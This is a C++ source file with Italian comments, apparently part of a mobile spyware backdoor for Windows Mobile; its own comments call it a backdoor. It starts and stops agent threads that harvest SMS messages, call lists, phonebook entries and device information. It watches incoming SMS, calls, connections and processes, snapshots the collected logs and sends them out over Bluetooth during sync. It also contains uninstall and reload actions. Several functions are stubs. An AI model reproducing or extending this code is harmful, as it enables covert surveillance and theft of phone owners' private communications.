#include <time.h>
#include <vector>
#include <exception>
using namespace std;

#include "Task.h"
#include "Conf.h"
#include "Status.h"
#include "Transfer.h"
#include "Agents.h"
#include "Events.h"

#define SLEEP_TIME 450	// Intervallo per il controllo della event list in ms

UINT Task::GetTime() {
	return 0;
}

void Task::Sleep() {
	Sleep(SLEEP_TIME);
}

void Task::Sleep(UINT ms) {
	::Sleep(ms);
}

// CRITICAL - L'handle del thread dell'agente verra' chiuso soltanto dalla StopAgents() al primo
// reload della backdoor. Da qui non abbiamo modo di sapere quale sia l'handle del thread associato
// a questo agente, quindi possiamo soltanto comandargli lo stop.
BOOL Task::StopAgent(UINT Type) {
	list<AgentStruct *>::iterator iter;
	list<AgentStruct *> *agents;
	
	// Cerchiamo l'agente e diciamogli di fermarsi
	WAIT_AND_SIGNAL(statusObj->bAgentsLock);
	agents = statusObj->GetAgentsList();

	if(agents == NULL){
		UNLOCK(statusObj->bAgentsLock);
		return AGENT_STOPPED;
	}

	for(iter = agents->begin(); iter != agents->end(); iter++){
		if((*iter)->uAgentId == Type){
			(*iter)->uCommand = AGENT_STOP;

			UNLOCK(statusObj->bAgentsLock);
			// Questa parte DEVE essere bloccante!
			LOOP{
				WAIT_AND_SIGNAL(statusObj->bAgentsLock);
				if((*iter)->uAgentStatus == AGENT_STOPPED){
					UNLOCK(statusObj->bAgentsLock);
					return AGENT_STOPPED;
				}
				UNLOCK(statusObj->bAgentsLock);
				Sleep(350);
			}
			
		}
	}	

	// Se siamo arrivati qui l'agente non e' stato trovato...
	// quindi sicuramente non sta girando ;p
	UNLOCK(statusObj->bAgentsLock);
	return AGENT_STOPPED; 
}

BOOL Task::StopAgents() {
	BOOL bAllStopped = FALSE;
	UINT i;
	list<AgentStruct *>::iterator iter;
	list<AgentStruct *> *agents;

	// Diciamo a tutti gli agenti di fermarsi
	WAIT_AND_SIGNAL(statusObj->bAgentsLock);
	agents = statusObj->GetAgentsList();

	if(agents == NULL){
		UNLOCK(statusObj->bAgentsLock);
		return AGENT_STOPPED;
	}

	for(iter = agents->begin(); iter != agents->end(); iter++){
		(*iter)->uCommand = AGENT_STOP;
	}
	UNLOCK(statusObj->bAgentsLock);

	/*	// E vediamo se sono tutti fermi (DEVE essere bloccante)
	while(bAllStopped == FALSE){
	bAllStopped = TRUE;

	WAIT_AND_SIGNAL(statusObj->bAgentsLock);
	agents = statusObj->GetAgentsList();

	for(iter = agents->begin(); iter != agents->end(); iter++){
	if((*iter)->uAgentStatus != AGENT_STOPPED){
	bAllStopped = FALSE;
	break;
	}
	}
	UNLOCK(statusObj->bAgentsLock);
	MiniSleep(350);
	}

	return (bAllStopped) ? AGENT_STOPPED : FALSE;*/

	// Aspettiamo che i thread muoiano
	WaitForMultipleObjects(uAgents, hAgents, TRUE, INFINITE);

	for(i = 0; i < uAgents; i++){
		CloseHandle(hAgents[i]);
		hAgents[i] = INVALID_HANDLE_VALUE;
	}

	delete[] hAgents;
	hAgents = NULL;
	uAgents = 0;

	return AGENT_STOPPED;
}

BOOL Task::StopEvents() {
	BOOL bAllStopped = FALSE;
	UINT i;
	list<EventStruct *>::iterator iter;
	list<EventStruct *> *events;

	// Diciamo a tutti gli agenti di fermarsi
	WAIT_AND_SIGNAL(statusObj->bEventsLock);
	events = statusObj->GetEventsList();

	if(events == NULL){
		UNLOCK(statusObj->bEventsLock);
		return EVENT_STOPPED;
	}

	for(iter = events->begin(); iter != events->end(); iter++){
		(*iter)->uCommand = EVENT_STOP;
	}
	UNLOCK(statusObj->bEventsLock);

/*	// E vediamo se sono tutti fermi (DEVE essere bloccante)
	while(bAllStopped == FALSE){
		bAllStopped = TRUE;

		WAIT_AND_SIGNAL(statusObj->bEventsLock);
		events = statusObj->GetEventsList();

		for(iter = events->begin(); iter != events->end(); iter++){
			if((*iter)->uEventStatus != EVENT_STOPPED){
				bAllStopped = FALSE;
				(*iter)->uCommand = EVENT_STOP;
				break;
			}
		}

		UNLOCK(statusObj->bEventsLock);
		MiniSleep(350);
	}*/

	// Aspettiamo che i thread muoiano
	WaitForMultipleObjects(uEvents, hEvents, TRUE, INFINITE);

	for(i = 0; i < uEvents; i++){
		CloseHandle(hEvents[i]);
		hEvents[i] = INVALID_HANDLE_VALUE;
	}

	delete[] hEvents;
	hEvents = NULL;
	uEvents = 0;

	//return (bAllStopped) ? EVENT_STOPPED : FALSE;
	return EVENT_STOPPED;
}

DWORD WINAPI Task::StartSms(LPVOID type) {
	throw "Not yet implemented";
}

DWORD WINAPI Task::StartPhoneBook(LPVOID type) {
	throw "Not yet implemented";
}

DWORD WINAPI Task::StartCallList(LPVOID type) {
	throw "Not yet implemented";
}

DWORD WINAPI Task::StartDevice(LPVOID type) {
	throw "Not yet implemented";
}

DWORD WINAPI Task::StartTimer(LPVOID type) {
	throw "Not yet implemented";
}

DWORD WINAPI Task::StartTransfer(LPVOID type) {
	throw "Not yet implemented";
}

// MANAGEMENT - L'agente per essere avviato deve comunque esser presente nel file di
// configurazione, settato come AGENT_DISABLED
BOOL Task::StartAgent(UINT Type) {
	UINT i;
	list<AgentStruct *>::iterator iter;
	list<AgentStruct *> *agents;

	WAIT_AND_SIGNAL(statusObj->bAgentsLock);
	agents = statusObj->GetAgentsList();

	if(agents == NULL){
		UNLOCK(statusObj->bAgentsLock);
		return TRUE;
	}

	for(iter = agents->begin(); iter != agents->end(); iter++){
		if((*iter)->uAgentId == Type && (*iter)->uAgentStatus != AGENT_RUNNING && (*iter)->pFunc){
			HANDLE t_Handle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)((*iter)->pFunc), *iter, 0, NULL);

			if(t_Handle == NULL){
				UNLOCK(statusObj->bAgentsLock);
				return FALSE;
			}

			// Espandiamo l'array degli handle
			uAgents++;

			HANDLE *t_Array = new(std::nothrow) HANDLE[uAgents];
			
			if(t_Array == NULL){
				uAgents--;
				CloseHandle(t_Handle);
				UNLOCK(statusObj->bAgentsLock);
				return FALSE;
			}

			// Copiamo tutti i vecchi handle
			for(i = 0; i < uAgents - 1; i++)
				t_Array[i] = hAgents[i];

			// Ed aggiungiamo il nostro
			t_Array[uAgents - 1] = t_Handle;

			delete[] hAgents;

			hAgents = t_Array;

			(*iter)->uAgentStatus = AGENT_ENABLED;
			break;
		}

	}

	UNLOCK(statusObj->bAgentsLock);
	return TRUE;
}

// MANAGEMENT - Qui vanno aggiunte le funzioni di start di tutti gli agenti che funzionano come thread!
BOOL Task::StartAgents() {
	UINT i;
	list<AgentStruct *>::iterator iter;
	list<AgentStruct *> *agents;

	// Imposta tutte le thread routine
	WAIT_AND_SIGNAL(statusObj->bAgentsLock);
	agents = statusObj->GetAgentsList();

	// Non e' necessaria la presenza degli agenti
	if(agents == NULL){
		UNLOCK(statusObj->bAgentsLock);
		return TRUE;
	}

	uAgents = 0;

	for(iter = agents->begin(); iter != agents->end(); iter++){
		switch((*iter)->uAgentId){
			case AGENT_SMS: (*iter)->pFunc = SmsAgent; break;
			case AGENT_CALLLIST: (*iter)->pFunc = CallListAgent; break;
			case AGENT_PHONEBOOK: (*iter)->pFunc = PhoneBookAgent; break;
			case AGENT_DEVICE: (*iter)->pFunc = DeviceInfoAgent; break;
			default: (*iter)->pFunc = NULL; break;
		}

		// Contiamo gli agenti attivi
		if((*iter)->uAgentStatus == AGENT_ENABLED && (*iter)->pFunc)
			uAgents++;
	}

	if(hAgents){
		delete[] hAgents;
		hAgents = NULL;
	}

	hAgents = new(std::nothrow) HANDLE[uAgents];

	if(hAgents == NULL)
		return FALSE;

	for(i = 0; i < uAgents; i++)
		hAgents[i] = INVALID_HANDLE_VALUE;

	// Avvia i thread che sono marcati come attivi
	for(i = 0, iter = agents->begin(); iter != agents->end(); iter++){
		if((*iter)->uAgentStatus == AGENT_ENABLED && (*iter)->pFunc){
			hAgents[i] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)((*iter)->pFunc), *iter, 0, NULL);

			if(hAgents[i] == NULL){

			}else{
				i++;
			}
		}
	}
	UNLOCK(statusObj->bAgentsLock);
	return TRUE;
}

// MANAGEMENT - Aggiungere qui le funzioni di gestione di ogni monitor
BOOL Task::RegisterEvents() {
	list<EventStruct *>::iterator iter;
	list<EventStruct *> *events;
	UINT i;

	// Imposta tutte le thread routine
	WAIT_AND_SIGNAL(statusObj->bEventsLock);
	events = statusObj->GetEventsList();

	// Non e' necessario registrare degli eventi
	if(events == NULL){
		UNLOCK(statusObj->bEventsLock);
		return TRUE;
	}

	uEvents = 0;

	for(iter = events->begin(); iter != events->end(); iter++){
		switch((*iter)->uEventType){
			case EVENT_SMS: (*iter)->pFunc = OnSms; break;
			case EVENT_CALL: (*iter)->pFunc = OnCall; break;
			case EVENT_CONNECTION: (*iter)->pFunc = OnConnection; break;
			case EVENT_TIMER: (*iter)->pFunc = OnTimer; break;
			case EVENT_PROCESS: (*iter)->pFunc = OnProcess; break;
			default: (*iter)->pFunc = NULL; break;
		}

		// Contiamo gli eventi configurati
		if((*iter)->pFunc)
			uEvents++;
	}

	if(hEvents){
		delete[] hEvents;
		hEvents = NULL;
	}

	hEvents = new(std::nothrow) HANDLE[uEvents];

	if(hEvents == NULL)
		return FALSE;

	for(i = 0; i < uEvents; i++)
		hEvents[i] = INVALID_HANDLE_VALUE;

	// Avvia i monitor
	for(i = 0, iter = events->begin(); iter != events->end(); iter++){
		if((*iter)->pFunc){
			hEvents[i] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)((*iter)->pFunc), *iter, 0, NULL);

			if(hEvents[i] == NULL){ // Il thread non e' partito... Andiamo cmq avanti
				
			}else{
				i++;
			}
		}
	}
	UNLOCK(statusObj->bEventsLock);

	return TRUE;
}

Task::Task() : bRemove(FALSE), statusObj(NULL), confObj(NULL), hEvents(NULL), hAgents(NULL),
uEvents(0), uAgents(0){
	statusObj = Status::self();
}

Task::~Task(){
	if(confObj)
		delete confObj;

	if(hEvents)
		delete[] hEvents;

	if(hAgents)
		delete[] hAgents;
}

BOOL Task::TaskInit() {
	if(statusObj == NULL)
		return FALSE;

	StopAgents();
	StopEvents();

	statusObj->Clear();

	// XXX - Da implementare: Dobbiamo uninstallare la backdoor
	if(bRemove){
		ActionUninstall(NULL); // Richiamiamo direttamente l'azione		
		return FALSE; // Torniamo come se fosse un errore
	}

	if(confObj){
		delete confObj;
		confObj = NULL;
	}

	confObj =  new(std::nothrow) Conf();

	if(confObj == NULL)
		return FALSE;

	if(confObj->LoadConf() == FALSE)
		return FALSE;

	// Da qui in poi inizia la concorrenza tra i thread
	if(RegisterEvents() == FALSE)
		return FALSE;

	return StartAgents();
}

BOOL Task::CheckActions() {
	list<MacroActionStruct *> *actions;
	list<MacroActionStruct *>::iterator iter;
	UINT i;

	if(bRemove) // Dobbiamo disinstallarci?
		return TRUE;

	// Inizia il loop di check degli eventi
	LOOP{
		WAIT_AND_SIGNAL(statusObj->bActionsLock);
		actions = statusObj->GetActionsList();
		UNLOCK(statusObj->bActionsLock);

		for(iter = actions->begin(); iter != actions->end(); iter++){
			if((*iter)->bTriggered){
				pActionStruct pAction = (*iter)->pActions;
				for(i = 0; i < (*iter)->uSubActions; i++, pAction++){
					switch(pAction->uActionType){
						case ACTION_SYNC: 
							/*WAIT_AND_SIGNAL(statusObj->bActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->bActionsLock);
							DBG_MSG(L"Sincherigi");*/
							ActionSync(pAction);
							break;

						case ACTION_UNINSTALL: 
							WAIT_AND_SIGNAL(statusObj->bActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->bActionsLock);
							bRemove = TRUE;
							return ActionUninstall(pAction);
							break;

						case ACTION_RELOAD:
							WAIT_AND_SIGNAL(statusObj->bActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->bActionsLock);
							return ActionReload(pAction);
							break;

						case ACTION_SMS:
							ActionSms(pAction); 
							break;

						case ACTION_TOOTHING: 
							ActionToothing(pAction); 
							break;

						default: break;
					}
				}
				WAIT_AND_SIGNAL(statusObj->bActionsLock);
				(*iter)->bTriggered = FALSE;
				UNLOCK(statusObj->bActionsLock);
			}
		}
		//UNLOCK(statusObj->bActionsLock);
		Sleep();
	}

	return TRUE;
}

BOOL Task::ActionSync(pActionStruct pAction) {
	UINT Type;

	// Allochiamo un oggetto log
	if(log == NULL){
		log = new(std::nothrow) Log();

		if(log == NULL)
			return FALSE;
	}

	if(pAction->uParamLength != 4)
		return FALSE;

	Type = *(UINT *)(pAction->pParams);

	// Stoppiamo gli agenti/eventi, prendiamo uno snapshot dei log
	// e procediamo con la sync
	StopAgents();
	StopEvents();

	log->MakeLogSnapshot();

	StartAgents();
	RegisterEvents();


	if((Type & CONF_SYNC_BT) == CONF_SYNC_BT){
		BtSend();

		// Attiva BT, connettiti, senda etc...
	}
/*	
	if((Type & CONF_SYNC_INTERNET) == CONF_SYNC_INTERNET){
		return TRUE;
	}
	
	if((Type & CONF_SYNC_WIFI) == CONF_SYNC_WIFI){
		return TRUE;
	}

	// Se c'e' una nuova configurazione fai il reload
	if(1){
		if(log){
			delete log;
			log = NULL;
		}

		//bNewConf = FALSE;
		return ActionReload(NULL);
	}
*/
	if(log){
		delete log;
		log = NULL;
	}

	return TRUE;
}

BOOL Task::ActionUninstall(pActionStruct pAction) {
	Log *log = NULL;
	list<WCHAR *> *logList;
	list<WCHAR *>::iterator iter;

	log = new(std::nothrow) Log();

	if(log == NULL)
		return FALSE;

	logList = log->ListLogs();

	if(logList == NULL){
		delete log;
		return TRUE;
	}

	for(iter = logList->begin(); iter != logList->end(); iter++){
		//DeleteFile(*iter); // XXX - Riabilitare questa riga
		delete[] (*iter);
	}

	logList->clear();
	delete logList;
	delete log;
	return TRUE;
}

BOOL Task::ActionReload(pActionStruct pAction) {
	return TRUE;
}

BOOL Task::ActionSms(pActionStruct pAction) {
	//CloseHandle(CreateFile(L"00-Sms.bin", GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL));
	return TRUE;
}

BOOL Task::ActionToothing(pActionStruct pAction) {
	//MessageBox(NULL, L"TOOTHING", L"ActionToothing()", MB_OK);
	//CloseHandle(CreateFile(L"00-Toothing.bin", GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL));
	return TRUE;
}